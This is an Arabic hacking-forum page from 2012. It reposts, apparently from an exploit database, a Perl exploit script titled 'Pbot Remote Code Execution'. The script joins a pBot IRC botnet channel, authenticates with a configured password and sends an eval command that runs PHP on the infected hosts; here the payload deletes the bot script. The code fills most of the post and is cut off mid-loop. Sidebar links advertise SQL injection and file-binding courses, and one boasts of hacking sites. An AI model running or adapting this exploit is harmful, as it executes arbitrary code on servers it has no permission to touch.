1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

ثغــرة في بوت Pbot ريموت , pBot Remote Code Execution

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏9 أغسطس 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 1,417 الردود : 0 ‏9 أغسطس 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    <div><div align="center">سلام عليكم

    نزلت ثغرة بالامس

    جديدة في قاعدة الثغرات



    <div style="margin:20px; margin-top:5px"> كود:
    #!/usr/bin/perl
    # Exploit Title: Pbot Remote Code Execution ("*" hostauth)
    # Date: 31.07.2012
    # Exploit Author: @bwallHatesTwits
    # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
    # Version: Various versions
    # Tested on: Linux 3.2

    use IO::Socket;
    use IO::Select;
    use IO::Socket::INET;
    use Socket;

    my $nickname = "BotSlayer";
    my $ident = "BotSlayer";
    my $fullname = "BotSlayer";
    $sel_client = IO::Select->new();

    #configuration values from the bot source
    $ircserver = "localhost"; #"server"
    $ircserverpass = ""; #"pass"
    my $ircport = "6667"; #"port"
    #if "key" is set, then add a space and the password to the chan name
    my @channels = ("#anonbxu"); #"chan" and "chan2"
    $botPass = "hello"; #"password"
    $botTrigger = "."; #"trigger"
    #hostauth must be "*"
    $loginCMD = "user"; #usually user or login

    #payload - PHP Code to run
    #This version deletes the bots originating script, and dies
    $phpEval = "*****_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();";

    $channelCount = scalar(@channels);

    sub onJoin
    {
    my $channel = shift;
    $channel = substr($channel, 1);
    print "Joined $channel\n";
    say($channel, $botTrigger.$loginCMD." $botPass");
    sleep(1);
    say($channel, $botTrigger."eval \@BallastSec ".$phpEval);
    print "Payload delivered\n";
    tryQuit();
    }

    sub tryQuit
    {
    $channelCount--;
    if($channelCount == 0)
    {
    quit("whomp wha");
    }
    }

    sub sendraw
    {
    if ($#_ == '1')
    {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    }
    else
    {
    print $IRC_cur_socket "$_[0]\n";
    }
    }

    sub conn
    {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket))
    {
    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_client->add($IRC_socket);
    $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
    $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
    $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
    if($ircserverpass != "")
    {
    sendraw("PASS ".$ircserverpass);
    }
    sendraw("NICK ".$mynick);
    sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
    sleep 1;
    }
    }

    sub parse
    {
    my $servarg = shift;
    print $servarg."\n";
    if ($servarg =~ /^PING \:(.*)/)
    {
    sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/)
    {
    my $channel = $4;
    onJoin($channel);
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/)
    {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/)
    {
    notice("$pn", "\001VERSION BotSlayer by Ballast Security\001");
    }
    if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ )
    {
    my $natrix = $1;
    my $arg = $2;
    }
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i)
    {
    if (lc($1) eq lc($mynick))
    {
    $mynick=$4;
    $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
    }
    }
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i)
    {
    $mynick = $2;
    $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
    $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
    foreach(@channels)
    {
    sendraw("JOIN $_");
    }
    }
    }
    my $line_temp;
    while(1)
    {
    while (!(keys(%irc_servers)))
    {
    conn($nickname, $ircserver, $ircport);
    }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready)
    {
    $IRC_cur_socket = $fh;
    $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_client->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);
    $msg =~ s/\r\n$//;
    for(my $c=0; $c
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...